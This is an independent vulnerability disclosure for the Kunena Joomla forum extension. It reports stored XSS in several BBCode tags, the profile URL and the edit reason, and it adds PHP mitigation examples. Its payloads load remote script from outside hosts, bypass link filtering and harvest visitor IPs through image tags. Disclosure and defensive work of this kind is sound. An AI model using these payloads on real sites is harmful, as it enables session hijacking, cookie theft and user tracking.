@Slowftw
Created November 23, 2022 21:39
Security Report
Kunena
October 2022 · Slowftw

Index

  1. Introduction
  2. Severity Glossary
  3. Identified Vulnerabilities
    1. Stored XSS: '[spoiler]' BBCode Tag $\small(\textcolor{#DF2935}{\sf{High}})$
    2. Stored XSS: '[tableau]' BBCode Tag $\small(\textcolor{#DF2935}{\sf{High}})$
    3. Stored XSS: '[terminal]' BBCode Tag $\small(\textcolor{#DF2935}{\sf{High}})$
    4. Stored XSS: Website URL in User Profile $\small(\textcolor{#FF6F22}{\sf{Medium}})$
    5. Stored XSS: Edit Reason in Topic Message $\small(\textcolor{#FF6F22}{\sf{Medium}})$
  4. Miscellaneous Issues
    1. Bypassing removeLinksInMessage function $\small(\textcolor{#DBDD2D}{\sf{Low}})$
    2. No proxy in '[img]' BBCode Tag $\small(\textcolor{#318EB1}{\sf{Info}})$

Introduction

"Kunena is the leading Joomla forum component. Downloaded more than 8M times in 11 years, Kunena is the only forum/discussion solution for Joomla that is community driven - true open source - public self-help forums, GitHub and documentation Wiki."

extensions.joomla.org/extension/kunena

This document describes the results of independent research into vulnerabilities in the Kunena project, carried out in October 2022 by Slowftw for self-learning, with no organisation or team involved. Tests and analysis were done against two versions of Joomla and Kunena installed in different directories of the same localhost website, with the following specifications:

Tested Environment Info
  1. Joomla! version:
    1. 3.10.11
    2. 4.2.3
  2. Kunena version:
    1. 5.2.10.1 [Queiriga]
    2. 6.0.3 [Git Repository]
  3. Default template:
    1. Joomla!:
      1. protostar 1.0
      2. cassiopeia 1.0
    2. Kunena:
      1. crypsis 5.2.10.1
      2. Aurelia 6.0.3
  4. Platform:
    1. Win10x64Xampp
    2. Apache/2.4.47
    3. OpenSSL/1.1.1k
    4. PHP/8.0.6
  5. MySQL version:
    1. 5.5.5-10.4.19-MariaDB

Severity Glossary

This section does not detail all existing severity levels, only those assigned to the issues discovered in this report. The descriptions have been adapted for this specific report and do not refer to any general definition of severity or risk.

🔴 $\small\textcolor{#DF2935}{\sf{High}}$: Issues that give attackers control of, or limited access to, sensitive areas and information (e.g. administrative cookies), which can lead to account compromise and leakage of confidential information without user interaction.
🟠 $\small\textcolor{#FF6F22}{\sf{Medium}}$: Issues of the same kind as High, but requiring user interaction to trigger.
🟡 $\small\textcolor{#DBDD2D}{\sf{Low}}$: Issues that facilitate the exploitation of the identified vulnerabilities.
🔵 $\small\textcolor{#318EB1}{\sf{Info}}$: Issues considered purely informational: protection recommendations or improvements that can generally improve the security/privacy posture.

Identified Vulnerabilities

🔴Stored XSS: '[spoiler]' BBCode Tag

Affected versions: 5.1.15 through 5.x
Release Note 5.1.14 - 1c57e85
Release Note 5.1.15 - 4006d58

Issue

The spoiler title is not escaped/encoded as HTML. The issue was previously reported on 13 August 2019 by Andrey Skuratov and fixed using htmlspecialchars, but the fix was reverted days later and replaced with a blacklist based on the regex #<script(.*?)>(.*?)</script>#is.

Steps to Reproduce

  1. Create an account if necessary;
  2. Create a topic, or anything else that is processed as BBCode;
  3. Paste the payload into the topic content.

Payload examples

  1. Bypassing regex:
    1. [spoiler="<script/src=//15.rs></script/>"][/spoiler]
    2. [spoiler="<<script></script>script/src=//15.rs></script>"][/spoiler]
  2. Event handler of other HTML tags:
    1. [spoiler="<img/src/onerror=jQuery.getScript`//15.rs`>"][/spoiler]
    2. [spoiler="<svg/onload=jQuery.getScript`//15.rs`>"][/spoiler]
    3. [spoiler="<audio/src/onerror=jQuery.getScript`//15.rs`>"][/spoiler]
    4. [spoiler="<details/open/ontoggle=jQuery.getScript`//15.rs`></details>"][/spoiler]
    5. and so on

If links are being removed (see Bypassing removeLinksInMessage below), the removal can be bypassed with an encoded dot such as %2E, \x2E or &#x2E;, or with other techniques.

Mitigation

Remove the regex blacklist and escape/encode the spoiler title as HTML. Don't try to sanitize input; escape output, e.g.:

$default = $default ? htmlspecialchars($default, ENT_COMPAT, 'UTF-8') : Text::_('COM_KUNENA_BBCODE_SPOILER');
$hidden = ($document instanceof \Joomla\CMS\Document\HtmlDocument);
$layout = KunenaLayout::factory('BBCode/Spoiler');
if ($layout->getPath())
{
	return (string) $layout
		->set('title', $default)
		->set('hidden', $hidden)
		->set('content', $content)
		->set('params', $params);
}
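To make the difference concrete, the following is an added example (not Kunena code) that runs the blacklist regex quoted above against the report's spoiler-title payloads and, next to it, the output-encoding approach the mitigation asks for. The containsLiveMarkup() check is a crude demo helper, not a sanitizer.

```php
<?php
// Added example (not Kunena code): the blacklist regex that replaced the 2019
// htmlspecialchars() fix, run against the report's spoiler-title payloads, next to
// plain output encoding. Run with: php spoiler_blacklist.php

declare(strict_types=1);

const BLACKLIST = '#<script(.*?)>(.*?)</script>#is';

/** The blacklist approach: strip anything matching the regex, output the rest raw. */
function blacklistTitle(string $title): string
{
    return (string) preg_replace(BLACKLIST, '', $title);
}

/** The fix: leave the title alone and encode it for the HTML text/attribute context. */
function escapeTitle(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Demo-only check: does the result still contain a tag the browser would parse? */
function containsLiveMarkup(string $html): bool
{
    return preg_match('#<[a-z][^>]*>#i', $html) === 1;
}

$payloads = [
    // Closing tag is "</script/>", so the literal "</script>" in the regex never matches.
    '<script/src=//15.rs></script/>',
    // The regex strips the inner "<script></script>" once; the leftovers form a new script tag.
    '<<script></script>script/src=//15.rs></script>',
    // No <script> at all: event handlers on other elements are outside the blacklist.
    '<img/src/onerror=jQuery.getScript`//15.rs`>',
    '<svg/onload=jQuery.getScript`//15.rs`>',
];

foreach ($payloads as $p) {
    $filtered = blacklistTitle($p);
    $escaped  = escapeTitle($p);
    printf("payload:   %s\nblacklist: %s  [%s]\nescaped:   %s  [%s]\n\n",
        $p,
        $filtered, containsLiveMarkup($filtered) ? 'STILL LIVE' : 'neutralised',
        $escaped,  containsLiveMarkup($escaped)  ? 'STILL LIVE' : 'neutralised');
}
```

Every payload survives the blacklist as live markup, while the encoded form contains no `<` at all. Note that the snippet above uses ENT_COMPAT, which leaves single quotes unencoded; ENT_QUOTES is the safer default when the value may end up inside a single-quoted attribute.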

🔴Stored XSS: '[tableau]' BBCode Tag

Affected versions: 1.6.0 through 5.x, 6.x
Release Note 1.6.0 - ca36e85

Issue

It is not safe to let users control the domain that is inserted into the src attribute of the script tag emitted for this BBCode.

Steps to Reproduce

  1. Create an account if necessary;
  2. Create a topic, or anything else that is processed as BBCode;
  3. Paste the payload into the topic content.

Payload example

  1. Neutralising the expected file path by turning the rest of the URL into a query string (?):
    1. [tableau]https://15.rs?//?:toolbar=no[/tableau]

Mitigation

Prevent normal users from controlling the script path/domain, or consider disabling/removing this BBCode tag, since it is not available in any of the default editors/templates.
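One way to implement the first option, as an added example (not Kunena's own handler): derive the host with parse_url(), accept it only from a fixed allowlist, and build the script src from fixed pieces so the user URL contributes nothing to it. The allowlist entry and the script path are assumptions for the demo.

```php
<?php
// Added example (not Kunena code): allowlist the host for the [tableau] embed and
// never let the user supply any part of the script path. The allowlist entry and
// the fixed script path are assumptions for this demo.

declare(strict_types=1);

const TABLEAU_HOSTS = ['public.tableau.com']; // assumed allowlist, adjust to the deployment

/**
 * Return the lower-cased host if the URL is https and its host is allowlisted, else null.
 * parse_url() is used so "?" and "#" tricks cannot smuggle a different host or path.
 */
function allowedTableauHost(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || ($parts['scheme'] ?? '') !== 'https' || empty($parts['host'])) {
        return null;
    }
    $host = strtolower($parts['host']);
    return in_array($host, TABLEAU_HOSTS, true) ? $host : null;
}

/** Build the embed only from fixed pieces plus the allowlisted host. */
function tableauScriptTag(string $url): ?string
{
    $host = allowedTableauHost($url);
    if ($host === null) {
        return null; // caller should render the raw text or an error instead
    }
    // Fixed script path (assumed for the demo), not taken from the user input.
    return '<script src="https://' . $host . '/javascripts/api/viz_v1.js"></script>';
}

$inputs = [
    'https://public.tableau.com/views/Example/Sheet1?:toolbar=no',
    'https://15.rs?//?:toolbar=no',          // report payload: attacker-controlled host
    'https://public.tableau.com.15.rs/x',    // look-alike host with a trailing suffix
    'http://public.tableau.com/views/x',     // plaintext scheme, rejected too
];
foreach ($inputs as $in) {
    printf("%-58s -> %s\n", $in, tableauScriptTag($in) ?? 'rejected');
}
```

Only the first input produces a script tag; the report's payload and the look-alike host are rejected because the comparison is an exact match against the allowlist, not a substring or regex test.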

🔴Stored XSS: '[terminal]' BBCode Tag

Affected versions: 2.0.0 through 5.x, 6.x
Release Note 2.0.0 - a93ee55

Issue

The colortext value is not validated as a CSS hex color before being inserted into the style of the pre tag.

Steps to Reproduce

  1. Create an account if necessary;
  2. Create a topic, or anything else that is processed as BBCode;
  3. Paste the payload into the topic content.

Payload examples

  1. Visible:
    1. [terminal colortext='"><script/src=//15.rs></script>'][/terminal]
  2. Inconspicuous:
    1. [terminal colortext='red"><script/src=//15.rs></script>cmd<x/'][/terminal]

Mitigation

Validate colortext as a CSS hex color, e.g., with the regex ^#[[:xdigit:]]{3,8}$ (or, more strictly, allow only the 3-, 4-, 6- and 8-digit forms that CSS defines). If a regex is not used, keep in mind that it is possible to inject new declarations into the style of the pre tag even without breaking out of the attribute, e.g.: [terminal colortext=";background:url(//x55.is"][/terminal].
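The following added example (not Kunena code) applies the report's regex and a stricter variant to the payloads above, and renders the style only from a validated value, falling back to a fixed default otherwise. The default colour is an assumption for the demo.

```php
<?php
// Added example (not Kunena code): validate the [terminal] colortext value before
// placing it in the pre tag's style attribute. The report's regex is shown next to
// a stricter one that only accepts the hex lengths CSS actually defines.

declare(strict_types=1);

/** The report's suggestion: '#' followed by 3 to 8 hex digits. */
function isHexColorLoose(string $value): bool
{
    return preg_match('/^#[[:xdigit:]]{3,8}$/', $value) === 1;
}

/** Stricter: CSS defines #rgb, #rgba, #rrggbb and #rrggbbaa only (3, 4, 6 or 8 digits). */
function isHexColorStrict(string $value): bool
{
    return preg_match('/^#(?:[[:xdigit:]]{3}|[[:xdigit:]]{4}|[[:xdigit:]]{6}|[[:xdigit:]]{8})$/', $value) === 1;
}

/** Render the style only from a validated value; otherwise use a fixed default (assumed). */
function terminalStyle(string $colortext, string $default = '#00ff00'): string
{
    $color = isHexColorStrict($colortext) ? $colortext : $default;
    return 'style="color:' . $color . '"';
}

$values = [
    '#0f0', '#00ff00', '#00ff0080',                 // valid CSS hex colours
    '#00ff0',                                       // 5 digits: loose accepts, CSS does not define it
    'red',                                          // named colour: both reject
    ';background:url(//x55.is',                     // CSS injection from the report
    '"><script/src=//15.rs></script>',              // attribute breakout from the report
    'red"><script/src=//15.rs></script>cmd<x/',
];
foreach ($values as $v) {
    printf("%-42s loose=%-3s strict=%-3s -> %s\n", $v,
        isHexColorLoose($v) ? 'ok' : 'no',
        isHexColorStrict($v) ? 'ok' : 'no',
        terminalStyle($v));
}
```

Both regexes reject every payload from the report; the strict variant additionally rejects 5- and 7-digit values, which browsers treat as invalid and ignore.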

🟠Stored XSS: Website URL in User Profile

Affected versions: 4.0.0-BETA1 through 5.x, 6.x
Release Note 4.0 - 2c9b492#L165-L168

Issue

The website URL is not encoded before being inserted into the href of the anchor tag, so it is possible to close the attribute and add new, unsafe attributes, e.g., onmouseover. New tags cannot be created because of the strip function.

Steps to Reproduce

  1. Create an account if necessary;
  2. Edit your user (e.g. in /forum/user/edit/);
  3. Paste the payload into the Website URL.

Payload examples

  1. Short domain/payload:
    1. http://0/"onmouseover="jQuery.getScript`//15.rs`
  2. To increase the available payload size (e.g. for a long domain name),
    inspect the page and remove type="url" from the #social-url element (this only disables the browser-side check):
    1. "onclick="jQuery.getScript`//xss.rocks/xss.js`

Default column type/length for websiteurl: varchar(50)

Mitigation

Escape/Encode websiteURL as HTML entity.

🟠Stored XSS: Edit Reason in Topic Message

Affected versions: 2.0.0? through 5.x
Release Note 2.0.0 - 8a9d3d9#L195

Issue

The modified_reason is not encoded before being inserted into the value attribute of the input tag, so it is possible to close the attribute and add new, unsafe attributes, e.g., onmouseover. New tags cannot be created because of the strip function. The payload is visible in the topic message, but if an admin/moderator opens the edit form directly through the link (e.g. /forum/test/1-2/edit/3) the chances of a successful attack increase.

Steps to Reproduce

  1. Create an account if necessary;
  2. Create/post a topic message;
  3. Edit the created message;
  4. Paste the payload into the Reason for editing.

Payload examples

  1. Low probability of user interaction:
    1. "onmouseover="alert()
  2. High probability of user interaction:
    1. "onmouseover="alert()"style="top:0;left:0;width:100%;height:100%;position:fixed;z-index:11

Mitigation

Escape/Encode modified_reason as HTML entity.
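The two Medium issues (Website URL in User Profile and Edit Reason in Topic Message) share one root cause, an unencoded double quote closing an HTML attribute, so one added example (not Kunena code) covers both: the profile URL rendered into an <a href> and modified_reason rendered into an <input value>, each through htmlspecialchars() with ENT_QUOTES. The href case also restricts the URL scheme to http(s); that check is not something this report covers, but output encoding alone cannot provide it, because a javascript: URL is a perfectly valid attribute value after encoding. The markup around the values and the hasEventHandler() helper are demo assumptions.

```php
<?php
// Added example (not Kunena code) for the two attribute-context issues above:
// the profile website URL in <a href> and modified_reason in <input value>.
// Both payloads rely on an unencoded " to close the attribute; ENT_QUOTES
// neutralises that. The href case additionally checks the scheme (assumed
// precaution, not from the report).

declare(strict_types=1);

/** Encode for an HTML attribute value that may be placed in double OR single quotes. */
function attr(string $value): string
{
    // ENT_COMPAT leaves ' alone; ENT_QUOTES encodes both quote characters.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the profile website link, or plain text if the scheme is not http(s). */
function websiteLink(string $websiteUrl, string $label): string
{
    $scheme = strtolower((string) parse_url($websiteUrl, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return attr($label);
    }
    return '<a href="' . attr($websiteUrl) . '" rel="nofollow noopener">' . attr($label) . '</a>';
}

/** Render the edit-reason input with the stored reason as its value. */
function editReasonInput(string $modifiedReason): string
{
    return '<input type="text" name="modified_reason" value="' . attr($modifiedReason) . '">';
}

/** Demo-only check: a successful breakout introduces a second, whitespace-separated on* attribute. */
function hasEventHandler(string $html): bool
{
    return preg_match('/\son[a-z]+\s*=/i', $html) === 1;
}

$websitePayloads = [
    'http://0/"onmouseover="jQuery.getScript`//15.rs`',
    '"onclick="jQuery.getScript`//xss.rocks/xss.js`',
    'javascript:alert(1)', // not from the report: shows why the scheme check is there
];
$reasonPayloads = [
    '"onmouseover="alert()',
    '"onmouseover="alert()"style="top:0;left:0;width:100%;height:100%;position:fixed;z-index:11',
];

foreach ($websitePayloads as $p) {
    $html = websiteLink($p, 'website');
    printf("website: %s\n  -> %s [%s]\n", $p, $html, hasEventHandler($html) ? 'LIVE' : 'inert');
}
foreach ($reasonPayloads as $p) {
    $html = editReasonInput($p);
    printf("reason:  %s\n  -> %s [%s]\n", $p, $html, hasEventHandler($html) ? 'LIVE' : 'inert');
}
```

In the output every `"` in the stored value appears as `&quot;`, so the onmouseover/onclick text stays inside the original attribute and is never parsed as an attribute of its own.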

Miscellaneous Issues

🟡Bypassing removeLinksInMessage function

Affected File/Code
ed1a402#L1011

Issue

This function was created to remove images and links from messages posted by newly registered users, but its regex blacklist can be bypassed, allowing the issues/vulnerabilities identified above to be exploited further. Payloads marked with * require the Auto-Link URLs option to be enabled.

Payload Examples

  1. IP Address
    1. http://1.1.1.1/ *
    2. [URL="1.1.1.1"]test[/URL]
    3. [url="1.1.1.1"]test[/url=]
    4. [url =1.1.1.1]test[/url] space before the equal sign
    5. [[url=][/url]url=1.1.1.1]test[/url]
    6. [img]http://1.1.1.1/file~.png[/img]
    7. [IMG]http://1.1.1.1/file~.png[/IMG]
  2. Accent Domain
    1. http://café.fr/ *
    2. [url="café.fr"]test[/url=]
  3. Unicode Domain Name
    1. http://ストア.com/ *
    2. [url="ストア.com"]test[/url=]
    3. http://⑮.rs/ *
    4. [url="⑮.rs"]test[/url=]
  4. Unicode TLD
    1. http://中央电视台.中国/ *
    2. [url="中央电视台.中国"]test[/url=]

Mitigation

Blacklisting with a regex is difficult here and fails.
Generate the HTML from the BBCode first and then remove the unwanted HTML tags, e.g.:

$text = KunenaHtmlParser::parseBBCode($text);
$text = preg_replace('/<div class="kmsgimage">.*?<\/div>|<a .*?<\/a>/s', '', $text);
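A regex over rendered HTML is still fragile (any nested element inside an anchor or the kmsgimage wrapper ends the match early). The following added example (not Kunena code) does the same output-side removal with a DOM pass instead. The sample HTML is constructed to mimic auto-linked URLs and Kunena's kmsgimage wrapper; the class name comes from the report, the rest of the structure is assumed.

```php
<?php
// Added example (not Kunena code): remove links and images from the *rendered*
// HTML, as the mitigation suggests, using DOMDocument instead of a regex so that
// nested markup cannot confuse the removal. The kmsgimage class name is from the
// report; the surrounding structure of the sample input is assumed.

declare(strict_types=1);

function stripLinksAndImages(string $html): string
{
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true); // tolerate fragment/garbage input quietly
    // Wrap the fragment so several top-level nodes survive; the PI fixes the charset.
    $doc->loadHTML('<?xml encoding="utf-8" ?><div id="kroot">' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $xpath = new DOMXPath($doc);
    $query = '//a | //img | //div[contains(concat(" ", normalize-space(@class), " "), " kmsgimage ")]';

    // Collect first: removing while iterating skips nodes.
    $victims = [];
    foreach ($xpath->query($query) as $node) {
        $victims[] = $node;
    }
    foreach ($victims as $node) {
        if ($node->parentNode !== null) {
            $node->parentNode->removeChild($node); // whole element, text included
        }
    }

    $root = $xpath->query('//div[@id="kroot"]')->item(0);
    $out  = '';
    foreach ($root->childNodes as $child) {
        $out .= (string) $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample of what the BBCode parser might emit for a new user's message.
$rendered = <<<'HTML'
Visit <a href="http://1.1.1.1/" rel="nofollow">http://1.1.1.1/</a> and
<a href="http://xn--caf-dma.fr/" rel="nofollow">café.fr</a> for <b>details</b>.
<div class="kmsgimage"><a href="http://1.1.1.1/file~.png"><img src="http://1.1.1.1/file~.png" alt=""></a></div>
Plain text stays.
HTML;

echo stripLinksAndImages($rendered), PHP_EOL;
```

Because the removal runs on the parsed output, it does not matter how the URL was written in the BBCode (IP address, accented or Unicode domain, odd spacing or nesting in the tag): anything that became an anchor or image is gone, while the bold text and plain text remain.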

🔵No proxy in '[img]' BBCode Tag

Affected File/Code
ed1a402#L2625

Issue

Why and what is a forward/reverse proxy?
There is no proxy between the user and the image's web server, so privacy-relevant information such as the user's IP address, referer and user agent is exposed to whoever hosts the image. A newly created user could use the previous issue to abuse this one.

Payload Examples

  1. Stealing IP and browser info:
    1. [img]https://505.netlify.app/.png[/img]

Mitigation

I recommend wsrv.nl, a free, fast, open-source and long-standing image caching and manipulation service.
The idea is to prefix the src of user-controlled images, e.g.:

<!-- [img]https://example.org/1.png[/img] -> urlencode() -->
<img src="https://wsrv.nl/?n=-1&default=placekitten.com/128&url=https%3A%2F%2Fexample.org%2F1.png">
<!--
"?n=-1"      = render all frames, so animated GIFs are not flattened to a static image
"&default="  = fallback image if the original fails to load
"&url="      = image to be processed. urlencode() this value; if it is left raw, users can append
               extra parameters to the service request, e.g. [img]https://example.org/1.png&filt=greyscale&x=.png[/img]
               becomes:
-->
<img src="https://wsrv.nl/?n=-1&default=placekitten.com/128&url=https://example.org/1.png&filt=greyscale&x=.png">
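As an added example (not Kunena code), the following builds the proxied src from a user-supplied [img] URL and sets the unsafe raw splice next to it, so the parameter-injection input above can be compared directly. The fallback image is the one from the example above and is an assumption for the demo.

```php
<?php
// Added example (not Kunena code): build the proxied src for a user-supplied [img]
// URL. http_build_query() percent-encodes every value, so "&", "=" and "?" inside
// the user URL stay part of the url= parameter instead of becoming parameters of
// their own. The fallback URL is assumed (taken from the report's example).

declare(strict_types=1);

const PROXY_BASE = 'https://wsrv.nl/';
const FALLBACK   = 'placekitten.com/128'; // assumed fallback, as in the report's example

/** Return the proxied src, or null if the input is not an absolute http(s) URL. */
function proxiedImageSrc(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false
        || !in_array($parts['scheme'] ?? '', ['http', 'https'], true)
        || empty($parts['host'])) {
        return null;
    }
    return PROXY_BASE . '?' . http_build_query([
        'n'       => -1,
        'default' => FALLBACK,
        'url'     => $url,
    ], '', '&', PHP_QUERY_RFC3986);
}

/** The unsafe variant from the report's second <img>: raw splice, no encoding. */
function naiveProxiedImageSrc(string $url): string
{
    return PROXY_BASE . '?n=-1&default=' . FALLBACK . '&url=' . $url;
}

$userUrl = 'https://example.org/1.png&filt=greyscale&x=.png'; // report's parameter-injection input
echo "naive: ", naiveProxiedImageSrc($userUrl), PHP_EOL; // filt=greyscale reaches the service
echo "safe:  ", proxiedImageSrc($userUrl), PHP_EOL;      // the whole string stays inside url=
var_dump(proxiedImageSrc('javascript:alert(1)'));        // NULL: not an http(s) URL
```

Encoding the default parameter as well costs nothing and keeps the fallback from becoming a second injection point if it is ever made configurable.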

An internal proxy function may require significant resources and development time, but here are some examples and articles about it:
